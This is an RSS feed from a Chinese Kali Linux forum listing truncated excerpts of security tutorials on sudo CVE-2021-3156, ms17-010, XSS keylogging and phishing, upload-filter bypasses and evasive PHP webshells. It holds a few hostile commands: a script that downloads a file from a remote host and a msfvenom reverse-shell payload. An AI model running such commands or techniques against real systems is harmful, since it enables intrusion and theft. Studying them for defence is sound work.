<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <title>Kali笔记 - Bug提交</title>
    <link>https://office.bbskali.cn/forum-49-1.html</link>
    <description>Latest 20 threads of Bug提交</description>
    <copyright>Copyright(C) Kali笔记</copyright>
    <generator>Discuz! Board by Comsenz Inc.</generator>
    <lastBuildDate>Thu, 16 Apr 2026 14:50:42 +0000</lastBuildDate>
    <ttl>60</ttl>
    <image>
      <url>https://office.bbskali.cn/static/image/common/logo_88_31.gif</url>
      <title>Kali笔记</title>
      <link>https://office.bbskali.cn/</link>
    </image>
    <item>
      <title>Centos8安装</title>
      <link>https://office.bbskali.cn/thread-2354-1-1.html</link>
      <description><![CDATA[[bt]一： 选择第一个开始安装[/bt]

[bt]二：项目检查[/bt]




[bt]三：设置语言[/bt]



[bt]四：点击每一项，设置软件源和root密码[/bt]



[bt]五：因为要做服务器，我们这里不安装桌面环境了。[/bt]



[bt]六：安装完成 重启[/bt]





 ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Thu, 25 Nov 2021 07:16:57 +0000</pubDate>
    </item>
    <item>
      <title>Dz论坛匿名发帖bug</title>
      <link>https://office.bbskali.cn/thread-2261-1-1.html</link>
      <description><![CDATA[匿名发帖漏洞
因为有的站长没有将Discuz X升级到最新版本。有些漏洞BUG被人发现了，可能绕过权限发布匿名发帖。最好升级最新版本。

默认DiscuzX程序是这样判断的：如果没有这个会员，或者会员主动选择匿名，都显示为匿名。
这些匿名发帖的可能是自动发帖机发的帖。或者 ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Mon, 31 May 2021 23:53:33 +0000</pubDate>
    </item>
    <item>
      <title>运行msfconsole提示错误Run `bundle install` to install missing gems.</title>
      <link>https://office.bbskali.cn/thread-2253-1-1.html</link>
      <description><![CDATA[运行msfconsole提示错误Run `bundle install` to install missing gems.
前两天更新了kali的系统，今天在运行msfconsole时提示下面的错误。
[pre]
Unable to find a spec satisfying metasploit-framework (&gt;= 0) in the set. Perhaps the lockfile is corrupted?
Run ` ...]]></description>
      <category>Bug提交</category>
      <author>小黄人</author>
      <pubDate>Thu, 08 Apr 2021 10:47:51 +0000</pubDate>
    </item>
    <item>
      <title>CVE-2021-3156漏洞复现</title>
      <link>https://office.bbskali.cn/thread-2235-1-1.html</link>
      <description><![CDATA[[bt]漏洞原因[/bt]
1.9.5p2之前的Sudo具有基于堆的缓冲区溢出，从而允许特权通过“ sudoedit -s”和以单个反斜杠字符结尾的命令行参数扩展为root

[bt]漏洞影响[/bt]
Sudo 1.8.2 – 1.8.31p2

Sudo 1.9.0 – 1.9.5p1

[bt]漏洞复现[/bt] ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Mon, 08 Mar 2021 23:33:13 +0000</pubDate>
    </item>
    <item>
      <title>浅谈PHPstudy后门利用</title>
      <link>https://office.bbskali.cn/thread-2015-1-1.html</link>
      <description><![CDATA[[md]### 环境说明：

* kali Linux
* phpstudy(2016)
* php5.4+apache

### burp 抓包
访问http://localhost/index.php在burp中抓包
**需要注意的是，后面一定要跟`xxx.php`**
![999.png](data/attachment/forum/202005/05/195613cdilaxczja6tap6a.png?imageMogr2/auto- ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Tue, 05 May 2020 12:04:53 +0000</pubDate>
    </item>
    <item>
      <title>ms17-010实战</title>
      <link>https://office.bbskali.cn/thread-2014-1-1.html</link>
      <description><![CDATA[[md]&gt; ms17-010 可以说是当前影响最大额一次漏洞了。在各个领域都受到了不少的冲击。今天我们一起来了解下！

![timg.jpg](data/attachment/forum/202005/05/152139xz9766k5zv2th7to.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 \&quot;timg.jpg\&quot;)

### 环境

* k ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Tue, 05 May 2020 07:19:44 +0000</pubDate>
    </item>
    <item>
      <title>【原创计划】记一次漏洞挖掘</title>
      <link>https://office.bbskali.cn/thread-1927-1-1.html</link>
      <description><![CDATA[当打开登录界面时 发现只是单纯的账号密码登录 也没有验证机制，猜想是否存在密码爆破  第一个漏洞：自己注册一下进行尝试，拿出神器burp，这里测试是否可以进行无限次密码尝试  当我们抓包之后 我们可以发现在登录处是明文传输 存在安全隐患 很清晰可以看到自己填写 ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Fri, 13 Mar 2020 05:07:41 +0000</pubDate>
    </item>
    <item>
      <title>dedecms漏洞的扫描器</title>
      <link>https://office.bbskali.cn/thread-1913-1-1.html</link>
      <description><![CDATA[已实现的功能
[*]后台查找（win）
[*]版本探测
[*]短路经检测
[*]路径检测
[*]trace检测
[*]advancedsearch.php SqlInject
[*]sql_class.php SqlInject
[*]feedback_js.php SqlInject
[*]getpage xss
[*]guestbook.php SqlInject
[*]infosearch.php SqlInject
[*]jump.p ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Sat, 22 Feb 2020 10:07:13 +0000</pubDate>
    </item>
    <item>
      <title>vps安装msfconsole</title>
      <link>https://office.bbskali.cn/thread-1807-1-1.html</link>
      <description><![CDATA[一：先安装依赖[pre]

yum groupinstall Development Tools
yum install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget
[/pre]

二：安装yaml和ruby
[p ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Mon, 18 Nov 2019 01:17:40 +0000</pubDate>
    </item>
    <item>
      <title>Nmap中一些常用的脚本</title>
      <link>https://office.bbskali.cn/thread-1804-1-1.html</link>
      <description><![CDATA[首先，我们扫描目标主机，检测开放的端口：
[bq]nmap site.test.lan[/bq]

[pre]
root@kali:~# nmap site.test.lan
Starting Nmap 7.70 ( https://nmap.org ) at 2019–05–31 11:58 MSK
Nmap scan report for site.test.lan (192.168.60.50)
Host is up (0.000030s lat ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Sun, 17 Nov 2019 11:06:15 +0000</pubDate>
    </item>
    <item>
      <title>存储型XSS漏洞利用</title>
      <link>https://office.bbskali.cn/thread-1799-1-1.html</link>
      <description><![CDATA[我们这里用一个Basic认证去做这个钓鱼攻击。我们在一个存在XSS漏洞的页面上面嵌入一个恶意请求，当用户打开这个页面。这个页面就会像攻击者的服务器发送请求，这个请求会返回一个Basic认证的头部。这时候会弹出一个提示框，要求受害者输入账号密码，从而盗取用户的账号 ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 07:59:14 +0000</pubDate>
    </item>
    <item>
      <title>xss漏洞利用之键盘记录</title>
      <link>https://office.bbskali.cn/thread-1798-1-1.html</link>
      <description><![CDATA[键盘记录修改 /var/www/html/pikachu/pkxss/rkeypress 下 rk.js 中的IP地址为攻击者地址
rk.js 是攻击代码，我们可以把这个 js 文件放到我们的恶意站点上，然后通过有 XSS 漏洞的页面去调用
这个文件可以记录用户的键盘操作，然后异步发送给攻击者
我们可以用下面的Payl ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 07:57:55 +0000</pubDate>
    </item>
    <item>
      <title>xss利用之吊打管理员</title>
      <link>https://office.bbskali.cn/thread-1797-1-1.html</link>
      <description><![CDATA[XSS之盲打XSS盲打不是攻击类型，而是一个攻击场景我们在前台输入

提交后我们输入的内容不会在前对输出，而是提交到了后台，可能管理员会去看。如果我们输入一个JS代码，管理员登录后台管理界面，如果后台把我们的内容输出。那后台管理员可能遭受到我们的XSS攻击，我们 ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 07:56:39 +0000</pubDate>
    </item>
    <item>
      <title>被利用Windows系统的特性绕过文件上传</title>
      <link>https://office.bbskali.cn/thread-1654-1-1.html</link>
      <description><![CDATA[比如文件名最后增加点和空格，写成[bq].php.[/bq]，上传后保存在Windows系统上的文件名最后的一个[bq].[/bq]会被去掉，实际上保存的文件名就是[bq].php[/bq]

Windows文件流特性绕过
文件名改成[bq].php::$DATA[/bq]，上传成功后保存的文件名其实是[bq].php[/bq]

 ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Sat, 27 Apr 2019 12:50:59 +0000</pubDate>
    </item>
    <item>
      <title>kali下生成的PHP一句话</title>
      <link>https://office.bbskali.cn/thread-1606-1-1.html</link>
      <description><![CDATA[kali下生成的PHP一句话，过狗 过盾 过云锁





[pre]]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Fri, 29 Mar 2019 01:38:12 +0000</pubDate>
    </item>
    <item>
      <title>kali中利用Steghide 隐藏秘密信息</title>
      <link>https://office.bbskali.cn/thread-1586-1-1.html</link>
      <description><![CDATA[[bt]安装[/bt]

[pre]
apt-get install steghide
[/pre]

以一个文本文件为例
创建一个文本文件，随便写入点东西：
[pre]
 vim bbskali.txt
[/pre]

我要把bbskali.txt隐藏到图片中：

[pre]
steghide embed -ef bbskali.txt -cf bbskali.jpg
[/pre]

下图中包含了隐藏 ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Thu, 21 Mar 2019 02:27:08 +0000</pubDate>
    </item>
    <item>
      <title>kali linux搭建tor</title>
      <link>https://office.bbskali.cn/thread-1585-1-1.html</link>
      <description><![CDATA[[bt]何为TOR[/bt]



[bt]原理[/bt]

在我大天朝，应该是这样

[bt]准备[/bt]



[*]首先有了一个梯子 
[*]你的ISP提供商并不知道你在使用Tor代理一定要可靠。
[*]它也许知道你在使用代理 Tor的入口点并不知道你的IP地址，而是代理的ip地址；
[*]代理一定要可靠。



[b ...]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Thu, 21 Mar 2019 02:20:21 +0000</pubDate>
    </item>
    <item>
      <title>js一句话下载payload</title>
      <link>https://office.bbskali.cn/thread-1584-1-1.html</link>
      <description><![CDATA[[bt]js代码[/bt]
写入：C:\\test&gt;cscript /nologo dowfile2.js http://192.168.1.115/robots.txt]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Tue, 19 Mar 2019 13:04:34 +0000</pubDate>
    </item>
    <item>
      <title>使用Nikto扫描网站漏洞</title>
      <link>https://office.bbskali.cn/thread-1582-1-1.html</link>
      <description><![CDATA[扫描的内容包括：

服务器错误配置
默认文件和程序
不安全的文件和程序
过期程序
使用示例：
[pre]
nikto -h http://your_target.com -o result.html
[/pre]
使用Nikto扫描网站漏洞

-h参数指定要扫描的主机；-o指定把扫描结果保存到result.html文件中，输出格式也可以 ...]]></description>
      <category>Bug提交</category>
      <author>libo</author>
      <pubDate>Mon, 18 Mar 2019 08:35:13 +0000</pubDate>
    </item>
    <item>
      <title>Micropoor_shellcode for payload backdoor</title>
      <link>https://office.bbskali.cn/thread-1580-1-1.html</link>
      <description><![CDATA[Micropoor_shellcode：

Usage:
[pre]
Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5
[/pre]
Generate payload:
[pre]
msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b \'\\x00\' -f c |grep -v]]></description>
      <category>Bug提交</category>
      <author>admin</author>
      <pubDate>Sun, 17 Mar 2019 13:54:08 +0000</pubDate>
    </item>
  </channel>
</rss>